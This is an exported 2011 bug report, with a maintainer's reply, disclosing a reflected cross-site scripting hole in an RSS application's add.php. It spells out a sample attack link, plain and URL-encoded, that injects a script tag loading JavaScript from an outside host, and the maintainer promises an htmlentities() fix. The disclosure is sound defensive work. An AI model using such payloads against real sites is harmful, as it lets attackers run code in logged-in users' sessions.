XSS exploit on logged-in users

[GoogleCodeExporter]

What steps will reproduce the problem?
1. If a user is logged into the system, an attacker can exploit add.php by 
sending the user a link with a script in the GET field.
2. If the user is logged in, then the attacker can execute any javascript code, 
including code loaded from a foreign website.

What is the expected output? What do you see instead?
This type of untrusted input should be rejected. Instead, it was echoed to the 
browser.

Please use labels and text to provide additional information.
This is a sample link that a logged in user could receive: 
http://VictimWebApp.com/add.php?rss_url="><SCRIPT 
SRC=http://ha.ckers.org/xss.js></SCRIPT
URL Encoded version:
http://VictimWebApp.com/add.php?rss_url=%22%3E%3CSCRIPT%20SRC=http://ha.ckers.or
g/xss.js%3E%3C/SCRIPT
This script is not dangerous, it only demonstrates an XSS attack.
I have attached one potential fix. It should be noted that this attack can also 
work on POST fields, so I have fixed those as well.

Original issue reported on code.google.com by [email protected] on 18 May 2011 at 7:56

Attachments:

• add.diff

[GoogleCodeExporter]

Thanks for reporting this, I will apply a similar change to yours.  I will use 
htmlentities() to sanitize $url, $opml, and $file at the point that they are 
output to the HTML page.

Original comment by [email protected] on 22 May 2011 at 5:44

• Changed state: Accepted